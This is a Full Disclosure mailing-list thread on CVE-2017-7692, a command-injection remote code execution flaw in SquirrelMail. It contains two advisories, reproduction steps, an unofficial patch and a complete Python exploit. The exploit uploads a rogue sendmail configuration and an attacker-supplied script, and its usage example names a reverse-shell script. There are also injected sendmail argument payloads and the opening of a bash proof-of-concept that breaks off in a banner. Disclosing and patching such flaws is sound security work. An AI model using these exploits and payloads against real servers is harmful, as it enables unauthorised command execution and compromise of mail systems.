[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: Re: [FD] CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution
- From: Dawid Golunski <dawid@xxxxxxxxxxxxxxxx>
- Date: Mon, 24 Apr 2017 18:28:21 -0300
Hi Filippo,
I'm re-sending my reply I sent on the weekend as it seems my reply to
the list got returned with a
delivery error.
I received a reply from MITRE regarding which CVE to use in this
situation. Here is the reply I received:
'CVE-2017-7692 is now correct.
CVE-2017-5181 is no longer a valid ID number according to our
http://cve.mitre.org/cve/cna/CNA_Rules_v1.1.pdf policy. We fully
recognize that you made an earlier report of the discovery, but we
need to use the CVE ID number that first appears in a public
disclosure. '
So I can confirm we should be using the new/duplicated one that was
issued to you in April
instead of the one I got in January.
I've released my advisory (taking the new CVEID into the account) at:
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
I also updated the advisory since then. It seems like the 1.4.23
version that got released is also vulnerable.
Regards,
Dawid Golunski
https://legalhackers.com
https://ExploitBox.io
t: @dawid_golunski
On Wed, Apr 19, 2017 at 2:17 PM, Filippo Cavallarin
<filippo.cavallarin@xxxxxxxxxxxxxxxx> wrote:
> Hi Dawid,
> ok great, I added the credits to the advisory.. now let's see what to do
> with the CVEs.
>
> Thanks!
> Filippo
>
>
>> On 19 Apr 2017, at 17:56, Dawid Golunski <dawid@xxxxxxxxxxxxxxxx> wrote:
>>
>> Hi Filippo,
>>
>> From the feedback I received several weeks ago, the vendor was having
>> some life issues and was unable to respond to it so I decided to give
>> more time before disclosure in this case.
>> I've sent him a quick email now too to point at this thread in case
>> he manages to release an official patch any time soon.
>>
>> I will release my advisory/exploit shortly on my website
>> https://legalhackers.com seeing that it is now public.
>>
>> I'll verify with MITRE what to do with the duplicate CVEID and which
>> one should be used for this issue and let you know.
>>
>> Credit would be appreciated. I'll mention yours in my advisory too.
>>
>> Thanks.
>>
>>
>>
>>
>>
>>
>> On Wed, Apr 19, 2017 at 12:40 PM, Filippo Cavallarin
>> <filippo.cavallarin@xxxxxxxxxxxxxxxx> wrote:
>>> Hi Dawid,
>>> I tried quite hard to contact the vendor but without success, then I
>>> decided to release all the details and a fix..
>>> I think the CVE I got should be rejected and marked as duplicate, but I
>>> don't know how to handle situations like this.. any idea?
>>> In the meantime, do you want me to put your name in the credits on my
>>> website?
>>>
>>> Best,
>>> Filippo
>>>
>>>> On 19 Apr 2017, at 16:36, Dawid Golunski <dawid@xxxxxxxxxxxxxxxx> wrote:
>>>>
>>>> Hi Filippo,
>>>>
>>>> I actually reported this vulnerability to the vendor at the beginning
>>>> of this year. I also got the following CVEID assigned for it in
>>>> January: CVE-2017-5181.
>>>> I was waiting on the vendor to patch the vulnerability since then
>>>> before I publish the details.
>>>>
>>>> Has he got back to you?
>>>>
>>>>
>>>>
>>>>
>>>> On Wed, Apr 19, 2017 at 10:07 AM, Filippo Cavallarin
>>>> <filippo.cavallarin@xxxxxxxxxxxxxxxx> wrote:
>>>>> Advisory ID: SGMA17-001
>>>>> Title: Squirrelmail Remote Code Execution
>>>>> Product: Squirrelmail
>>>>> Version: 1.4.22 and probably prior
>>>>> Vendor: squirrelmail.org
>>>>> Type: Command Injection
>>>>> Risk level: 4 / 5
>>>>> Credit: filippo.cavallarin@xxxxxxxxxxxxxxxx
>>>>> CVE: CVE-2017-7692
>>>>> Vendor notification: 2017-04-04
>>>>> Vendor fix: N/A
>>>>> Public disclosure: 2017-04-19
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> DETAILS
>>>>>
>>>>> Squirrelmail version 1.4.22 (and probably prior) is vulnerable to a
>>>>> remote code execution vulnerability because
>>>>> it fails to sanitize a string before passing it to a popen call. It's
>>>>> possible to exploit this vulnerability to
>>>>> execute arbitrary shell commands on the remote server.
>>>>>
>>>>> The problem is in Deliver_SendMail.class.php on initStream function that
>>>>> uses escapeshellcmd() to sanitize the
>>>>> sendmail command before executing it. The use of escapeshellcmd() is not
>>>>> correct in this case since it don't
>>>>> escapes whitespaces allowing the injection of arbitrary command
>>>>> parameters.
>>>>>
>>>>> $this->sendmail_command = "$sendmail_path $this->sendmail_args
>>>>> -f$envelopefrom";
>>>>> $stream = popen(escapeshellcmd($this->sendmail_command), "w");
>>>>>
>>>>>
>>>>> The $envelopefrom variable is controlled by the attacker, hence it's
>>>>> possible to trick sendmail to use an
>>>>> attacker-provided configuration file that triggers the execution of an
>>>>> arbitrary command.
>>>>>
>>>>> In order to exploit this vulnerability the MTA in use must be sendmail
>>>>> and Squirrelmail must be configured
>>>>> to use it as commandline (useSendmail directive of the config file set to
>>>>> true).
>>>>> Also, the edit_identity directive of the config file must be bet to true,
>>>>> but this is the default configuration.
>>>>>
>>>>> To reproduce the issue follow these steps:
>>>>> 1. Create a rogue sendmail.cf that triggers the execution of a
>>>>> /usr/bin/touch:
>>>>> [...]
>>>>> Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S,
>>>>> S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
>>>>> T=DNS/RFC822/X-Unix,
>>>>> A=X /tmp/executed
>>>>> 2. Upload it as a mail attachment and get it's remote name (ex:
>>>>> lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)
>>>>> 3. Go to Options -> Personal Informations and set the following
>>>>> payload as Email Address:
>>>>> <aaa@xxxxxxx -OQueueDirectory=/tmp -C
>>>>> /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>
>>>>> 4. Send an email
>>>>> 5. Verify the execution of the command with "ls /tmp/executed" on
>>>>> the remote server
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> PROOF OF CONCEPT
>>>>>
>>>>> The followig python script exploits this vulnerability to execute an
>>>>> attacker provided bash script on the remote server.
>>>>>
>>>>> BOF
>>>>> #!/usr/bin/env python
>>>>> # -*- coding: utf-8 -*-
>>>>>
>>>>> """
>>>>>
>>>>> SquirrelMail 1.4.22 Remote Code Execution (authenticated)
>>>>> Exploit code for CVE-2017-7692
>>>>> filippo.cavallarin@xxxxxxxxxxxxxxxx
>>>>>
>>>>> """
>>>>>
>>>>> from __future__ import unicode_literals
>>>>> import sys
>>>>> import os
>>>>> import re
>>>>> import requests
>>>>>
>>>>> reload(sys)
>>>>> sys.setdefaultencoding('utf8')
>>>>>
>>>>>
>>>>> SENDMAILCF="/tmp/squirrelmail1_4_22-sendmailcf-rce"
>>>>> COMPOSE = "/src/compose.php"
>>>>> INFOS = "/src/options.php?optpage=personal"
>>>>> SQM_ATTACH_PATH = "/var/local/squirrelmail/attach/"
>>>>> # must be enclosed in <> otherwise spaces will be removed ..
>>>>> SENDER = "<px@xxxxxxxx -OQueueDirectory=/tmp -C %s%s>"
>>>>>
>>>>>
>>>>> SESSID = ""
>>>>> BASEURL = ""
>>>>>
>>>>>
>>>>> def attach(attachment):
>>>>> url = "%s%s" % (BASEURL, COMPOSE)
>>>>> token = get_csrf_token(url)
>>>>>
>>>>> values = {
>>>>> "smtoken": token,
>>>>> "attach": "add"
>>>>> }
>>>>>
>>>>> try:
>>>>> files = {'attachfile': open(attachment,'rb')}
>>>>> resp = requests.post(url, files=files, data=values,
>>>>> cookies={'SQMSESSID':SESSID})
>>>>> fname =
>>>>> re.search(r'att_local_name";s:[0-9]+:"([a-zA-Z0-9]+)"',
>>>>> resp.text)
>>>>> if not fname:
>>>>> print "\nError: unable to upload file %s" % attachment
>>>>> return fname.group(1)
>>>>>
>>>>> except Exception as e:
>>>>> print "\nError: %s" % e
>>>>> sys.exit(1)
>>>>>
>>>>>
>>>>> def send():
>>>>> url = "%s%s" % (BASEURL, COMPOSE)
>>>>> token = get_csrf_token(url)
>>>>>
>>>>> values = {
>>>>> "smtoken": token,
>>>>> "send_to": "root",
>>>>> "send": "Send"
>>>>> }
>>>>>
>>>>> try:
>>>>> resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
>>>>> except Exception as e:
>>>>> print "\nError: %s" % e
>>>>> sys.exit(1)
>>>>>
>>>>>
>>>>> def set_identity(sender):
>>>>> url = "%s%s" % (BASEURL, INFOS)
>>>>> token = get_csrf_token(url)
>>>>> values = {
>>>>> "smtoken": token,
>>>>> "optpage": "personal",
>>>>> "optmode": "submit",
>>>>> "new_email_address": sender,
>>>>> "submit_personal": "Submit"
>>>>> }
>>>>>
>>>>> try:
>>>>> requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
>>>>> except Exception as e:
>>>>> print "\nError: %s" % e
>>>>> sys.exit(1)
>>>>>
>>>>>
>>>>> def get_csrf_token(url):
>>>>> try:
>>>>> body = requests.get(url, cookies={'SQMSESSID':SESSID}).text
>>>>> inp = re.search(r'<input.*name="smtoken".*>', body, re.MULTILINE)
>>>>> token = re.search(r'value="([a-zA-Z0-9]+)"', inp.group(0))
>>>>> if token:
>>>>> return token.group(1)
>>>>> except Exception as e:
>>>>> pass
>>>>>
>>>>> print "\nUnable to get CSRF token"
>>>>> sys.exit(1)
>>>>>
>>>>> def outw(s):
>>>>> sys.stdout.write(s)
>>>>> sys.stdout.flush()
>>>>>
>>>>> def main(argv):
>>>>> global BASEURL
>>>>> global SESSID
>>>>>
>>>>> if len(argv) != 4:
>>>>> print (
>>>>> "SquirrelMail 1.4.22 Remote Code Execution (authenticated) -
>>>>> filippo.cavallarin@xxxxxxxxxxxxxxxx\n"
>>>>> "The target server must use sendmail and squirrelmail must be
>>>>> configured to use /usr/bin/sendmail\n"
>>>>> "Usage:\n"
>>>>> " %s <url> <session_id> <script>\n"
>>>>> " url: the url of squirrelmail\n"
>>>>> " session_id: the value of SQMSESSID cookie\n"
>>>>> " script: the path to the bash script to be executed on the
>>>>> target\n"
>>>>> "Example:\n"
>>>>> " %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24
>>>>> reverseshell.sh"
>>>>> ) % (argv[0], argv[0])
>>>>>
>>>>> sys.exit(1)
>>>>>
>>>>> BASEURL = argv[1]
>>>>> SESSID = argv[2]
>>>>> script = argv[3]
>>>>>
>>>>> outw("Uploading script ... ")
>>>>> script_fname = attach(script)
>>>>> print "ok"
>>>>>
>>>>>
>>>>> outw("Generating sendmail.cf ... ")
>>>>> try:
>>>>> script_path = "%s%s" % (SQM_ATTACH_PATH, script_fname)
>>>>> with open(SENDMAILCF, 'w') as f:
>>>>> f.write(SENDMAILCF_CONTENT % script_path)
>>>>> except Exception as e:
>>>>> print "\nError: %s" % e
>>>>> sys.exit(1)
>>>>> print "ok"
>>>>>
>>>>> outw("Uploading sendmail.cf ... ")
>>>>> smc_fname = attach(SENDMAILCF)
>>>>> os.remove(SENDMAILCF)
>>>>> print "ok"
>>>>>
>>>>> outw("Updating user options ... ")
>>>>> sender = SENDER % (SQM_ATTACH_PATH, smc_fname)
>>>>> set_identity(sender)
>>>>> print "ok"
>>>>>
>>>>> outw("Checking identity field ... ")
>>>>> icheck = requests.get("%s%s" % (BASEURL, INFOS),
>>>>> cookies={'SQMSESSID':SESSID}).text
>>>>> if not smc_fname in icheck:
>>>>> print "\nError: unable to set identity field .. maybe squirrelmail is
>>>>> configured with edit_identity=false"
>>>>> sys.exit(1)
>>>>> print "ok"
>>>>>
>>>>> outw("Executing script ... ")
>>>>> send()
>>>>> print "ok\n"
>>>>> sys.exit(0)
>>>>>
>>>>> SENDMAILCF_CONTENT = """
>>>>> O
>>>>> DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile
>>>>> Kdequote dequote
>>>>> Scanonify=3
>>>>> R$@ $@ <@>
>>>>> R$* $: $1 <@> mark addresses
>>>>> R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>
>>>>> R@ $* <@> $: @ $1 unmark @host:...
>>>>> R$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr
>>>>> R$* :: $* <@> $: $1 :: $2 unmark node::addr
>>>>> R:include: $* <@> $: :include: $1 unmark :include:...
>>>>> R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon
>>>>> R$* : $* <@> $: $2 strip colon if marked
>>>>> R$* <@> $: $1 unmark
>>>>> R$* ; $1 strip trailing semi
>>>>> R$* < $+ :; > $* $@ $2 :; <@> catch <list:;>
>>>>> R$* < $* ; > $1 < $2 > bogus bracketed semi
>>>>> R$@ $@ :; <@>
>>>>> R$* $: < $1 > housekeeping <>
>>>>> R$+ < $* > < $2 > strip excess on left
>>>>> R< $* > $+ < $1 > strip excess on right
>>>>> R<> $@ < @ > MAIL FROM:<> case
>>>>> R< $+ > $: $1 remove housekeeping <>
>>>>> R@ $+ , $+ $2
>>>>> R@ [ $* ] : $+ $2
>>>>> R@ $+ : $+ $2
>>>>> R $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax
>>>>> R $+ : $* ; $@ $1 : $2; list syntax
>>>>> R$+ @ $+ $: $1 < @ $2 > focus on domain
>>>>> R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right
>>>>> R$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical
>>>>> R$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names
>>>>> R$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps
>>>>> R$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains
>>>>> R$* %% $* $1 @ $2 First make them all @s.
>>>>> R$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.
>>>>> R$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish
>>>>> R$* $@ $>Canonify2 $1
>>>>> SCanonify2=96
>>>>> R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all
>>>>> R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain
>>>>> R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain
>>>>> R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]
>>>>> R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal
>>>>> R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr
>>>>> Sfinal=4
>>>>> R$+ :; <@> $@ $1 : handle <list:;>
>>>>> R$* <@> $@ handle <> and list:;
>>>>> R$* < @ $+ . > $* $1 < @ $2 > $3
>>>>> R$* < @ *LOCAL* > $* $1 < @ $j > $2
>>>>> R$* < $+ > $* $1 $2 $3 defocus
>>>>> R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical
>>>>> R@ $* $@ @ $1 ... and exit
>>>>> R$+ @ $- . UUCP $2!$1 u@xxxxxx => h!u
>>>>> R$+ %% $=w @ $=w $1 @ $2 u%%host@host => u@host
>>>>> SRecurse=97
>>>>> R$* $: $>canonify $1
>>>>> R$* $@ $>parse $1
>>>>> Sparse=0
>>>>> R$* $: $>Parse0 $1 initial parsing
>>>>> R<@> $#local $: <@> special case error msgs
>>>>> R$* $: $>ParseLocal $1 handle local hacks
>>>>> R$* $: $>Parse1 $1 final parsing
>>>>> SParse0
>>>>> R<@> $@ <@> special case error msgs
>>>>> R$* : $* ; <@> $#error $@ 5.1.3 $: "553 List:; syntax illegal for
>>>>> recipient addresses"
>>>>> R@ <@ $* > < @ $1 > catch "@@host" bogosity
>>>>> R<@ $+> $#error $@ 5.1.3 $: "553 User address required"
>>>>> R$+ <@> $#error $@ 5.1.3 $: "553 Hostname required"
>>>>> R$* $: <> $1
>>>>> R<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4
>>>>> R<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4
>>>>> R<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: "553 Invalid address"
>>>>> R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3
>>>>> R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "553 Colon illegal in host name
>>>>> part"
>>>>> R<> $* $1
>>>>> R$* < @ . $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
>>>>> R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
>>>>> R$* < @ $* @ > $* $#error $@ 5.1.2 $: "553 Invalid route address"
>>>>> R$* @ $* < @ $* > $* $#error $@ 5.1.3 $: "553 Invalid route address"
>>>>> R$* , $~O $* $#error $@ 5.1.3 $: "553 Invalid route address"
>>>>> R$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user
>>>>> R< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... -> ...
>>>>> R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here
>>>>> R< @ $+ > $#error $@ 5.1.3 $: "553 User address required"
>>>>> R$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ...
>>>>> R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"
>>>>> R< @ *LOCAL* > $#error $@ 5.1.3 $: "553 User address required"
>>>>> R$* $=O $* < @ *LOCAL* >
>>>>> $@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ...
>>>>> R$* < @ *LOCAL* > $: $1
>>>>> SParse1
>>>>> R$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet
>>>>> spec
>>>>> R$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path
>>>>> R$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost:
>>>>> send
>>>>> R$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost
>>>>> with mailer
>>>>> R$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost
>>>>> without mailer
>>>>> R$=L < @ $=w . > $#local $: @ $1 special local names
>>>>> R$+ < @ $=w . > $#local $: $1 regular local name
>>>>> R$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on
>>>>> smarthost name
>>>>> R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain
>>>>> R$=L $#local $: @ $1 special local names
>>>>> R$+ $#local $: $1 regular local names
>>>>> SLocal_localaddr
>>>>> Slocaladdr=5
>>>>> R$+ $: $1 $| $>"Local_localaddr" $1
>>>>> R$+ $| $#ok $@ $1 no change
>>>>> R$+ $| $#$* $#$2
>>>>> R$+ $| $* $: $1
>>>>> R$+ + * $#local $@ $&h $: $1
>>>>> R$+ + $* $#local $@ + $2 $: $1 + *
>>>>> R$+ $: <> $1
>>>>> R< > $+ $: < > < $1 <> $&h > nope, restore +detail
>>>>> R< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail
>>>>> R< > < $+ <> $* > $: < > < $1 > else discard
>>>>> R< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part
>>>>> R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +
>>>>> R< > < $+ > $@ $1 no +detail
>>>>> R$+ $: $1 <> $&h add +detail back in
>>>>> R$+ <> + $* $: $1 + $2 check whether +detail
>>>>> R$+ <> $* $: $1 else discard
>>>>> R< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host
>>>>> extension
>>>>> R< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host
>>>>> extension
>>>>> R< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >
>>>>> R< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 >
>>>>> SParseLocal=98
>>>>> SEnvFromL
>>>>> R<@> $n errors to mailer-daemon
>>>>> R@ <@ $*> $n temporarily bypass Sun bogosity
>>>>> R$+ $: $>AddDomain $1 add local domain if needed
>>>>> R$* $: $>MasqEnv $1 do masquerading
>>>>> SEnvToL
>>>>> R$+ < @ $* > $: $1 strip host part
>>>>> R$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type
>>>>> R<e s> $+ + $* $: $1 remove +detail for sender
>>>>> R< $* > $+ $: $2 else remove mark
>>>>> SHdrFromL
>>>>> R<@> $n errors to mailer-daemon
>>>>> R@ <@ $*> $n temporarily bypass Sun bogosity
>>>>> R$+ $: $>AddDomain $1 add local domain if needed
>>>>> R$* $: $>MasqHdr $1 do masquerading
>>>>> SHdrToL
>>>>> R$+ $: $>AddDomain $1 add local domain if needed
>>>>> R$* $: $>MasqHdr $1 do all-masquerading
>>>>> SAddDomain
>>>>> R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
>>>>> R$+ $@ $1 < @ *LOCAL* > add local qualification
>>>>> Mlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL,
>>>>> R=EnvToL/HdrToL,
>>>>> T=DNS/RFC822/X-Unix,
>>>>> A=X %s
>>>>> Mprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
>>>>> D=$z:/,
>>>>> T=X-Unix/X-Unix/X-Unix,
>>>>> A=sh -c $u
>>>>>
>>>>> """
>>>>>
>>>>> if __name__ == '__main__':
>>>>> main(sys.argv)
>>>>>
>>>>> EOF
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> SOLUTION
>>>>>
>>>>> Since the vendor did not respond to our mails, no official fix is
>>>>> available.
>>>>> However, the following unofficial patch can be used to fix this
>>>>> vulnerability.
>>>>>
>>>>> BOF
>>>>> diff -ruN
>>>>> squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php
>>>>> squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
>>>>> --- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php
>>>>> 2011-01-06 02:44:03.000000000 +0000
>>>>> +++
>>>>> squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
>>>>> 2017-04-18 11:42:26.505181944 +0000
>>>>> @@ -93,9 +93,9 @@
>>>>> $envelopefrom = trim($from->mailbox.'@'.$from->host);
>>>>> $envelopefrom =
>>>>> str_replace(array("\0","\n"),array('',''),$envelopefrom);
>>>>> // save executed command for future reference
>>>>> - $this->sendmail_command = "$sendmail_path $this->sendmail_args
>>>>> -f$envelopefrom";
>>>>> + $this->sendmail_command = escapeshellcmd("$sendmail_path
>>>>> $this->sendmail_args -f") . escapeshellarg($envelopefrom);
>>>>> // open process handle for writing
>>>>> - $stream = popen(escapeshellcmd($this->sendmail_command), "w");
>>>>> + $stream = popen($this->sendmail_command, "w");
>>>>> return $stream;
>>>>> }
>>>>> EOF
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> REFERENCES
>>>>>
>>>>> https://squirrelmail.org/
>>>>> https://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html
>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Regards,
>>>> Dawid Golunski
>>>> https://legalhackers.com
>>>> t: @dawid_golunski
>>>
>>
>>
>>
>> --
>> Regards,
>> Dawid Golunski
>> https://legalhackers.com
>> t: @dawid_golunski
>
--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
~~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~
Interested in security / vulns / exploits ?
Check out the new project of the author of this advisory:
ExploitBox.io
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
============================================
- Author: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2017-7692
- Release date: 22.04.2017
- Revision 2.0
- Last revision: 24.04.2017
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
SquirrelMail <= 1.4.23 Remote Code Execution
II. BACKGROUND
-------------------------
"
SquirrelMail is a standards-based webmail package written in PHP.
It includes built-in pure PHP support for the IMAP and SMTP protocols, and all
pages render in pure HTML 4.0 (with no JavaScript required) for maximum
compatibility across browsers. It has very few requirements and is very easy
to configure and install. SquirrelMail has all the functionality you would
want from an email client, including strong MIME support, address books, and
folder manipulation."
https://squirrelmail.org/about/
III. INTRODUCTION
-------------------------
SquirrelMail is affected by a critical Remote Code Execution vulnerability
which stems from insufficient escaping of user-supplied data when
SquirrelMail has been configured with Sendmail as the main transport.
An authenticated attacker may be able to exploit the vulnerability
to execute arbitrary commands on the target and compromise the remote
system.
IV. DESCRIPTION
-------------------------
The vulnerability is similar to the following vulnerabilities previously
discovered
by the author of this advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
When SquirrelMail has been configured with Sendmail as delivery transport,
SquirrelMail uses the following function to send out user emails:
-----[ ./class/deliver/Deliver_SendMail.class.php ]-----
function initStream($message, $sendmail_path, $ignore=0, $ignore='',
$ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') {
$rfc822_header = $message->rfc822_header;
$from = $rfc822_header->from[0];
$envelopefrom = trim($from->mailbox.'@'.$from->host);
$envelopefrom =
str_replace(array("\0","\n"),array('',''),$envelopefrom);
// save executed command for future reference
$this->sendmail_command = "$sendmail_path $this->sendmail_args
-f$envelopefrom";
// open process handle for writing
$stream = popen(escapeshellcmd($this->sendmail_command), "w");
return $stream;
}
---------------------------------------------------------
SquirrelMail allows authenticated users to control envelopefrom (Return-Path)
address
through the webmail web interface.
As we can see it calls str_replace() to sanitize the user input to prevent
injection of additional parameters to the sendmail command.
Unfortunately it does not take into account \t (TAB) character which can be
used by attackers to inject additional parameters.
If attacker sets their email address (Return-Path) in the options to
attacker@localhost -oQ/tmp/ -X/tmp/sqpoc
and then sends a new email.
The sendmail program will be called with the following arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-i]
Arg no. 2 == [-t]
Arg no. 3 == [-fattacker@localhost]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/tmp/sqpoc]
which will result in /tmp/sqpc file created on disk with email log (-X parameter
causes sendmail to save the debug/maillog into a file).
As demonstrated by the PoC exploit below, attacker can also inject -Cparameter
to
provide a malicious sendmail config file which can be uploaded as an attachment
to
achieve arbitrary command execution.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
-----[ SquirrelMail_RCE_exploit.sh ]------
#!/bin/bash
#
int='\033[94m
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.0)
Discovered and coded by
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
ExploitBox project:
https://ExploitBox.io
\033[0m'
# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write
# * RCE
# It requires user credentials and that SquirrelMail uses
# Sendmail method as email delivery transport
#
#
# Full advisory URL:
#
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
#
# Tested on: # Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
